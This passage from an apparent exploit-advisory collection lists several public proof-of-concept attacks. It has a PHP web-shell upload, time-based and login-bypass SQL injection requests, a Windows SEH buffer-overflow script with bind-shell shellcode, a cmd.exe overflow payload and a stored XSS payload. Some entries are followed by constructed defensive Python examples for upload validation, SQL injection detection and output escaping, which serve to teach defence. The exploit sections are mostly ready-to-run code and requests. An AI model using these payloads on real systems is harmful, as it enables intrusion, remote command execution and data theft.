Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c

-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="id"

1
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="firstname"

A
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="lastname"

a
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="username"

admin
-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="password"


-----------------------------1399170066243244238234165712
Content-Disposition: form-data; name="img"; filename="na3na3.php"
Content-Type: image/jpeg

<?php echo "<pre>";system($_GET['cmd']); ?>
-----------------------------1399170066243244238234165712--
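Three entries on this page (Online Reviewer System, 3DPrint Lite and the Budget and Expense Tracker request just above) are the same defect: the upload handler trusts the client-supplied filename or `Content-Type` and stores the file under the web root with the name it arrived with, so a `.php` file declared as `image/jpeg` is written where the server will execute it. The added example below is not code from any of those projects; it is the validation an image-upload endpoint should perform, expressed in Python so it can be run against the PoC inputs. The allowed-type table, magic bytes and the sample uploads are constructed for the illustration.

```python
import os
import re
import secrets

# Image types the form is meant to accept: extension -> (MIME type, leading magic bytes).
# Constructed for this example; the signatures are the standard PNG/JPEG/GIF headers.
ALLOWED_IMAGES = {
    "png":  ("image/png",  b"\x89PNG\r\n\x1a\n"),
    "jpg":  ("image/jpeg", b"\xff\xd8\xff"),
    "jpeg": ("image/jpeg", b"\xff\xd8\xff"),
    "gif":  ("image/gif",  b"GIF8"),
}

# Only a plain stem is accepted; separators and shell-relevant characters are refused.
SAFE_STEM = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def validate_upload(filename, declared_mime, content):
    """Return (ok, reason, stored_name). Every decision is taken on what the server
    received, never on the client's filename or Content-Type alone."""
    base = os.path.basename(filename)          # strip any directory components
    parts = base.lower().split(".")
    if len(parts) != 2:
        # 'shell.php.jpg' or a bare 'shell': exactly one extension is required
        return False, "filename must have exactly one extension", None
    stem, ext = parts
    if ext not in ALLOWED_IMAGES:
        return False, f"extension .{ext} is not an allowed image type", None
    if not SAFE_STEM.match(stem):
        return False, "unsafe characters in filename", None
    expected_mime, magic = ALLOWED_IMAGES[ext]
    if declared_mime != expected_mime:
        return False, "declared Content-Type does not match extension", None
    if not content.startswith(magic):
        return False, "file header does not match an image of that type", None
    if b"<?php" in content or b"<?=" in content:
        # A valid image header followed by PHP is still executable on a misconfigured host.
        return False, "embedded PHP tag", None
    # Store under a server-chosen random name so the client never controls the path.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return True, "ok", stored


# Constructed sample uploads: the two PoC payloads from this page and three variations.
SAMPLE_UPLOADS = [
    ("kh4waja.php", "application/octet-stream", b'<?php echo shell_exec($_REQUEST["cmd"]); ?>'),
    ("na3na3.php", "image/jpeg", b'<?php echo "<pre>";system($_GET[\'cmd\']); ?>'),
    ("photo.php.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"\x00" * 16),
    ("photo.jpg", "image/jpeg", b"\xff\xd8\xff\xe0" + b"<?php system('id'); ?>"),
    ("../../photo.png", "image/png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
]

if __name__ == "__main__":
    for name, mime, body in SAMPLE_UPLOADS:
        print(name, "->", validate_upload(name, mime, body))
```

Validation of this kind is the first half of the fix; the other half is configuration, namely storing uploads outside the document root or disabling script execution in the upload directory, so that a file which slips through is served as bytes rather than run.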
  20. # Exploit Title: SmarterTools SmarterTrack 7922 - 'Multiple' Information Disclosure
# Google Dork: intext:"Powered by SmarterTrack"
# Date: 23/01/2020
# Exploit Author: Andrei Manole
# Vendor Homepage: https://www.smartertools.com/
# Software Link: https://www.smartertools.com/smartertrack
# Version: TESTED ON 10.x -> 14.x and to Build 7922 (set 9, 2021)
# Tested on: Windows 10

POC:
VULNERABLE TARGET/Management/Chat/frmChatSearch.aspx

This file discloses every agent's id, first name and second name.
  21. # Exploit Title: Police Crime Record Management Project 1.0 - Time Based SQLi
# Exploit Author: ()t/\/\1
# Date: 23/09/2021
# Vendor Homepage: https://www.sourcecodester.com/php/14894/police-crime-record-management-system.html
# Tested on: Linux
# Version: 1.0
# Exploit Description: The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input. An attacker can exploit these issues to upload arbitrary files in the context of the web server process and execute commands.

The application suffers from an unauthenticated SQL Injection vulnerability. Input passed through the 'edit' GET parameter in 'http://127.0.0.1//ghpolice/admin/investigation.php' is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and retrieve sensitive data.

# PoC request

GET /ghpolice/admin/investigation.php?edit=210728101'-IF(MID(user(),1,1)='r',SLEEP(2),0)--+- HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: PHPSESSID=a36f66fa4a5751d4a15db458d573139c
Upgrade-Insecure-Requests: 1
  22. # Exploit Title: Ether_MP3_CD_Burner 1.3.8 - Buffer Overflow (SEH)
# Date: 24.09.2021
# Software Link: https://mp3-avi-mpeg-wmv-rm-to-audio-cd-burner.software.informer.com/download/?caa8ec-1.2
# Software Link 2: https://anonfiles.com/X2Ff36J6ue/ether_cd_burner_exe
# Exploit Author: Achilles
# Tested Version: 1.3.8
# Tested on: Windows 7 64bit

# 1.- Run python code : Ether_MP3_CD_Burner.py
# 2.- Open EVIL.txt and copy All content to Clipboard
# 3.- Open Ether_MP3_CD_Burner and press Register
# 4.- Paste the Content of EVIL.txt into the 'Name and Code Field'
# 5.- Click 'OK'
# 6.- Nc.exe Local IP Port 3110 and you will have a bind shell
# 7.- Greetings go:XiDreamzzXi,Metatron

#!/usr/bin/env python
import struct

buffer = "\x41" * 1008
nseh = "\xeb\x06\x90\x90" #jmp short 6
seh = struct.pack('<L',0x10037859) #SkinMagic.dll
nops = "\x90" * 20

#msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=3110 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -i 1 -f python
#badchars "\x00\x0a\x0d"
shellcode = ("\xb8\xf4\xc0\x2a\xd0\xdb\xd8\xd9\x74\x24\xf4\x5a\x2b"
"\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\xb6\xce\xc8"
"\x25\xca\x27\x8e\xc6\x32\xb8\xef\x4f\xd7\x89\x2f\x2b"
"\x9c\xba\x9f\x3f\xf0\x36\x6b\x6d\xe0\xcd\x19\xba\x07"
"\x65\x97\x9c\x26\x76\x84\xdd\x29\xf4\xd7\x31\x89\xc5"
"\x17\x44\xc8\x02\x45\xa5\x98\xdb\x01\x18\x0c\x6f\x5f"
"\xa1\xa7\x23\x71\xa1\x54\xf3\x70\x80\xcb\x8f\x2a\x02"
"\xea\x5c\x47\x0b\xf4\x81\x62\xc5\x8f\x72\x18\xd4\x59"
"\x4b\xe1\x7b\xa4\x63\x10\x85\xe1\x44\xcb\xf0\x1b\xb7"
"\x76\x03\xd8\xc5\xac\x86\xfa\x6e\x26\x30\x26\x8e\xeb"
"\xa7\xad\x9c\x40\xa3\xe9\x80\x57\x60\x82\xbd\xdc\x87"
"\x44\x34\xa6\xa3\x40\x1c\x7c\xcd\xd1\xf8\xd3\xf2\x01"
"\xa3\x8c\x56\x4a\x4e\xd8\xea\x11\x07\x2d\xc7\xa9\xd7"
"\x39\x50\xda\xe5\xe6\xca\x74\x46\x6e\xd5\x83\xa9\x45"
"\xa1\x1b\x54\x66\xd2\x32\x93\x32\x82\x2c\x32\x3b\x49"
"\xac\xbb\xee\xe4\xa4\x1a\x41\x1b\x49\xdc\x31\x9b\xe1"
"\xb5\x5b\x14\xde\xa6\x63\xfe\x77\x4e\x9e\x01\x7b\xa9"
"\x17\xe7\xe9\xa5\x71\xbf\x85\x07\xa6\x08\x32\x77\x8c"
"\x20\xd4\x30\xc6\xf7\xdb\xc0\xcc\x5f\x4b\x4b\x03\x64"
"\x6a\x4c\x0e\xcc\xfb\xdb\xc4\x9d\x4e\x7d\xd8\xb7\x38"
"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3"
"\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0"
"\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86"
"\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e"
"\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7"
"\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4"
"\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef"
"\x77\x03\x31\x3a")

payload = buffer + nseh + seh + nops + shellcode

try:
    f=open("Evil.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
  23. # Exploit Title: Pharmacy Point of Sale System 1.0 - SQLi Authentication Bypass
# Date: 23.09.2021
# Exploit Author: Janik Wehrli
# Vendor Homepage: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/pharmacy.zip
# Version: 1.0
# Tested on: Kali Linux, Windows 10

# Pharmacy Point of Sale System v1.0 Login can be bypassed with a simple SQLi

POST /pharmacy/Actions.php?a=login HTTP/1.1
Host: 192.168.209.170
Content-Length: 38
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.209.170
Referer: http://192.168.209.170/pharmacy/login.php
Accept-Encoding: gzip, deflate
Accept-Language: de-CH,de-DE;q=0.9,de;q=0.8,en-US;q=0.7,en;q=0.6
Cookie: PHPSESSID=c5mtnqpcavhfgsambtnh4uklag
Connection: close

username='OR+1%3D1+--+-&password=PWNED
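The two SQL injection entries above carry the two payload shapes a detection engineer most often has to recognise: a quoted tautology closed off with a comment (`'OR 1=1 -- -`, the login bypass) and a conditional `SLEEP()` probe (`IF(...,SLEEP(2),0)`, the time-based case). The added example below is not from either advisory; it decodes the query string and, for form-encoded POSTs, the body of each request record and scans every parameter value against a small signature set, exercised on the two PoC requests plus two benign look-alikes. The request records, signature names and sample traffic are constructed for the illustration; the patterns are heuristics and will need tuning against real traffic (a legitimate value ending in `--` would match the comment signature).

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Signatures for the two injection styles on this page: a quoted tautology plus a
# trailing comment (login bypass) and a conditional SLEEP()/BENCHMARK() (time-based).
SIGNATURES = [
    ("tautology", re.compile(r"""['"]\s*or\s+['"]?\w*['"]?\s*=\s*['"]?\w*['"]?""", re.I)),
    ("comment-terminator", re.compile(r"(--\s*-?|#|/\*)\s*$")),
    ("time-based", re.compile(r"\b(sleep|benchmark|pg_sleep|waitfor\s+delay)\s*\(", re.I)),
    ("conditional", re.compile(r"\bif\s*\(.*,\s*(sleep|benchmark)\s*\(", re.I)),
]


def request_params(request):
    """Yield (name, decoded value) for every query-string parameter and, for
    form-encoded POSTs, every body parameter. parse_qsl undoes %XX and '+' encoding,
    which is what turns 'OR+1%3D1' into the "OR 1=1" the signatures look for."""
    for item in parse_qsl(urlsplit(request["path"]).query, keep_blank_values=True):
        yield item
    if request.get("content_type", "").startswith("application/x-www-form-urlencoded"):
        for item in parse_qsl(request.get("body", ""), keep_blank_values=True):
            yield item


def scan_request(request):
    """Return [(parameter, signature)] hits for one request; [] means nothing matched."""
    hits = []
    for name, value in request_params(request):
        for label, pattern in SIGNATURES:
            if pattern.search(value):
                hits.append((name, label))
    return hits


def flag_requests(records):
    """Return [(index, hits)] for the records that matched at least one signature."""
    flagged = []
    for index, record in enumerate(records):
        hits = scan_request(record)
        if hits:
            flagged.append((index, hits))
    return flagged


# Constructed sample traffic: the two PoC requests from the advisories and two benign ones.
SAMPLE_REQUESTS = [
    {"method": "GET",
     "path": "/ghpolice/admin/investigation.php?edit=210728101'-IF(MID(user(),1,1)='r',SLEEP(2),0)--+-"},
    {"method": "POST", "path": "/pharmacy/Actions.php?a=login",
     "content_type": "application/x-www-form-urlencoded; charset=UTF-8",
     "body": "username='OR+1%3D1+--+-&password=PWNED"},
    {"method": "GET", "path": "/ghpolice/admin/investigation.php?edit=210728101"},
    {"method": "POST", "path": "/pharmacy/Actions.php?a=login",
     "content_type": "application/x-www-form-urlencoded; charset=UTF-8",
     "body": "username=o%27neil&password=it%27s-fine"},
]

if __name__ == "__main__":
    for index, hits in flag_requests(SAMPLE_REQUESTS):
        print(index, SAMPLE_REQUESTS[index]["path"], hits)
```

Decoding before matching is the point of the example: the raw body `'OR+1%3D1+--+-` contains no literal `=` and no space, so a signature applied to the undecoded log line would miss the bypass entirely. On the application side, the fix for both advisories is the same, parameterised queries, which make the decoded value inert regardless of what it contains.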
  24. # Title: Microsoft Windows cmd.exe - Stack Buffer Overflow
# Author: John Page (aka hyp3rlinx)
# Date: 15/09/2021
# Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt
# ISR: ApparitionSec

[Vendor]
www.microsoft.com

[Product]
cmd.exe is the default command-line interpreter for the OS/2, eComStation, ArcaOS, Microsoft Windows (Windows NT family and Windows CE family), and ReactOS operating systems.

[Vulnerability Type]
Stack Buffer Overflow

[CVE Reference]
N/A

[Security Issue]
A specially crafted payload will trigger a Stack Buffer Overflow in the NT Windows "cmd.exe" command-line interpreter. Requires running an already dangerous file type like .cmd or .bat. However, when cmd.exe accepts arguments using the /c or /k flags, which execute commands specified by string, that will also trigger the buffer overflow condition. E.g. cmd.exe /c <PAYLOAD>.

[Memory Dump]

(660.12d4): Stack buffer overflow - code c0000409 (first/second chance not available)
ntdll!ZwWaitForMultipleObjects+0x14:
00007ffb`00a809d4 c3              ret
0:000> .ecxr
rax=0000000000000022 rbx=000002e34d796890 rcx=00007ff7c0e492c0
rdx=00007ff7c0e64534 rsi=000000000000200e rdi=000000000000200c
rip=00007ff7c0e214f8 rsp=000000f6a82ff0a0 rbp=000000f6a82ff1d0
 r8=000000000000200c  r9=00007ff7c0e60520 r10=0000000000000000
r11=0000000000000000 r12=000002e34d77a810 r13=0000000000000002
r14=000002e34d796890 r15=000000000000200d
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
cmd!StripQuotes+0xa8:
00007ff7`c0e214f8 cc              int     3
0:000> !analyze -v
*******************************************************************************
*                                                                             *
*                        Exception Analysis                                   *
*                                                                             *
*******************************************************************************

Failed calling InternetOpenUrl, GLE=12029

FAULTING_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc              int     3

EXCEPTION_RECORD:  ffffffffffffffff -- (.exr 0xffffffffffffffff)
ExceptionAddress: 00007ff7c0e214f8 (cmd!StripQuotes+0x00000000000000a8)
   ExceptionCode: c0000409 (Stack buffer overflow)
  ExceptionFlags: 00000001
NumberParameters: 1
   Parameter[0]: 0000000000000008

PROCESS_NAME:  cmd.exe

ERROR_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_CODE: (NTSTATUS) 0xc0000409 - The system detected an overrun of a stack-based buffer in this application. This overrun could potentially allow a malicious user to gain control of this application.

EXCEPTION_PARAMETER1:  0000000000000008

MOD_LIST: <ANALYSIS/>

NTGLOBALFLAG:  0

APPLICATION_VERIFIER_FLAGS:  0

FAULTING_THREAD:  00000000000012d4

BUGCHECK_STR:  APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE

PRIMARY_PROBLEM_CLASS:  STACK_BUFFER_OVERRUN_EXPLOITABLE

DEFAULT_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE

LAST_CONTROL_TRANSFER:  from 00007ffafcfca9c6 to 00007ffb00a809d4

STACK_TEXT:
000000f6`a82fea38 00007ffa`fcfca9c6 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!ZwWaitForMultipleObjects+0x14
000000f6`a82fea40 00007ffa`fcfca8ae : 00000000`00000098 00000000`00000096 00000000`d000022d 00000000`d000022d : KERNELBASE!WaitForMultipleObjectsEx+0x106
000000f6`a82fed40 00007ffa`fe1d190e : 00000000`00000000 000000f6`a82ff1d0 00007ff7`c0e3e000 00007ffb`009f5a81 : KERNELBASE!WaitForMultipleObjects+0xe
000000f6`a82fed80 00007ffa`fe1d150f : 00000000`00000000 00000000`00000000 00000000`00000003 00000000`00000001 : kernel32!WerpReportFaultInternal+0x3ce
000000f6`a82feea0 00007ffa`fd05976b : 00000000`00000000 000000f6`a82ff1d0 00000000`00000004 00000000`00000000 : kernel32!WerpReportFault+0x73
000000f6`a82feee0 00007ff7`c0e26b6a : 00007ff7`c0e3e000 00007ff7`c0e3e000 00000000`0000200e 00000000`0000200c : KERNELBASE!UnhandledExceptionFilter+0x35b
000000f6`a82feff0 00007ff7`c0e26df6 : 000002e3`00000000 00007ff7`c0e10000 000002e3`4d796890 00007ff7`c0e6602c : cmd!_raise_securityfailure+0x1a
000000f6`a82ff020 00007ff7`c0e214f8 : 000002e3`4d77a810 00000000`00000000 00000000`00000002 00000000`0000200e : cmd!_report_rangecheckfailure+0xf2
000000f6`a82ff0a0 00007ff7`c0e2096f : 00000000`0000200c 000000f6`a82ff1d0 000000f6`a82ff1d0 00000000`0000200e : cmd!StripQuotes+0xa8
000000f6`a82ff0d0 00007ff7`c0e239a9 : 000002e3`4d76ff90 000002e3`4d76ff90 00000000`00000000 000002e3`4d76ff90 : cmd!SearchForExecutable+0x443
000000f6`a82ff390 00007ff7`c0e1fb9e : 00000000`00000000 000002e3`4d76ff90 ffffffff`ffffffff 000002e3`4d990000 : cmd!ECWork+0x69
000000f6`a82ff600 00007ff7`c0e1ff35 : 00007ff7`c0e4fbb0 000002e3`4d76ff90 00000000`00000000 00000000`00000001 : cmd!FindFixAndRun+0x3de
000000f6`a82ffaa0 00007ff7`c0e2277e : 00000000`00000002 000000f6`a82ffbb0 00000000`00000000 00000000`00000002 : cmd!Dispatch+0xa5
000000f6`a82ffb30 00007ff7`c0e26a89 : 00000000`00000001 00000000`00000000 00007ff7`c0e3fd78 00000000`00000000 : cmd!main+0x1fa
000000f6`a82ffbd0 00007ffa`fe1e1fe4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : cmd!wil::details_abi::ProcessLocalStorage<wil::details_abi::ProcessLocalData>::~ProcessLocalStorage<wil::details_abi::ProcessLocalData>+0x289
000000f6`a82ffc10 00007ffb`00a4efc1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : kernel32!BaseThreadInitThunk+0x14
000000f6`a82ffc40 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21

FOLLOWUP_IP:
cmd!StripQuotes+a8
00007ff7`c0e214f8 cc              int     3

SYMBOL_STACK_INDEX:  8

SYMBOL_NAME:  cmd!StripQuotes+a8

FOLLOWUP_NAME:  MachineOwner

MODULE_NAME: cmd

IMAGE_NAME:  cmd.exe

DEBUG_FLR_IMAGE_TIMESTAMP:  0

STACK_COMMAND:  ~0s ; kb

FAILURE_BUCKET_ID:  STACK_BUFFER_OVERRUN_EXPLOITABLE_c0000409_cmd.exe!StripQuotes

BUCKET_ID:  X64_APPLICATION_FAULT_STACK_BUFFER_OVERRUN_MISSING_GSFRAME_SOFTWARE_NX_FAULT_EXPLOITABLE_MISSING_GSFRAME_cmd!StripQuotes+a8

[Exploit/POC]

PAYLOAD = chr(235) + "\\CC"
PAYLOAD = PAYLOAD * 3000

with open("hate.cmd", "w") as f:
    f.write(PAYLOAD)

[Network Access]
Local

[Video PoC URL]
https://www.youtube.com/watch?v=wYYgjV-PzD8

[Severity]
Low

[Disclosure Timeline]
Vendor Notification: Requires running dangerous file types already.
September 15, 2021 : Public Disclosure

[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. All content (c). hyp3rlinx
  25. # Exploit Title: WordPress Plugin Wappointment 2.2.4 - Stored Cross-Site Scripting (XSS)
# Date: 2021-07-31
# Exploit Author: Renos Nikolaou
# Software Link: https://downloads.wordpress.org/plugin/wappointment.2.2.4.zip
# Version: 2.2.4
# Tested on: Windows
# Description : Wappointment is prone to Stored Cross Site Scripting vulnerabilities
# because it fails to properly sanitize user-supplied input.

# PoC - Stored XSS - Parameter: name
# 1) Open Wappointment Plugin or Visit booking-page http://localhost/booking-page
# 2) Click on any available delivery modality (By Phone, At a Location, Video Meeting or By Skype)
# 3) Select Date and Time, write your email address, your phone number and in the Full Name field type: testname"><img src=x onerror=prompt(1)>
# 4) Click Confirm
# 5) Login as admin to wp-admin portal, Go to Wappointment --> Calendar ( http://localhost/wordpress/wp-admin/admin.php?page=wappointment_calendar )

# Post Request (Step 4):

POST /wordpress/wp-json/wappointment/v1/services/booking HTTP/1.1
Host: domain.com
Content-Length: 205
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:52.0) Gecko/20100101 Firefox/52.0
Content-Type: application/json
Origin: http://domain.com
Referer: http://domain.com/wordpress/booking-page/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"email":"[email protected]","name":"testname\"><img src=x onerror=prompt(1)>","phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest","service":1,"location":3,"duration":90,"staff_id":2}
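The two layers the advisory says are missing, input validation on the booking endpoint and output escaping in the admin calendar, as an added example that is not part of the advisory or the plugin's code. It is Python rather than the plugin's PHP, the booking body is a constructed copy of the request above, and the name rules and the calendar HTML fragment are assumptions for illustration.

```python
import html
import json
import re

# Constructed copy of the JSON body posted to wp-json/wappointment/v1/services/booking.
BOOKING_BODY = (
    '{"email":"[email protected]","name":"testname\\"><img src=x onerror=prompt(1)>",'
    '"phone":"+00 00 000000","time":1630666800,"ctz":"Europe/Bucharest",'
    '"service":1,"location":3,"duration":90,"staff_id":2}'
)

# Assumed allowlist for a "Full Name" field: letters (any script), marks,
# spaces, apostrophes, hyphens and dots; no markup characters at all.
_NAME_RE = re.compile(r"^[^\W\d_][\w' .\-]{0,99}$", re.UNICODE)


def parse_booking(body):
    """Decode the booking request body into a dict."""
    return json.loads(body)


def name_is_valid(name):
    """Layer 1 (input): reject names that do not match the allowlist,
    which includes every name containing <, >, " or &."""
    return bool(_NAME_RE.match(name)) and not any(c in name for c in '<>"&')


def render_calendar_entry(booking):
    """Layer 2 (output): build the admin calendar fragment with the name
    escaped for both the attribute and the element-body context."""
    safe = html.escape(booking["name"], quote=True)
    return f'<div class="appt" title="{safe}">{safe}</div>'


def handle_booking(body):
    """Endpoint logic: validate, then store; return the rendered entry or None."""
    booking = parse_booking(body)
    if not name_is_valid(booking["name"]):
        return None                      # 400 Bad Request in the real handler
    return render_calendar_entry(booking)


if __name__ == "__main__":
    b = parse_booking(BOOKING_BODY)
    print("valid name:", name_is_valid(b["name"]))   # False
    print(render_calendar_entry(b))                   # no <img> tag survives
```

Escaping alone already neutralises the stored payload on the calendar page; the allowlist additionally keeps it out of the database and any other view that renders the name.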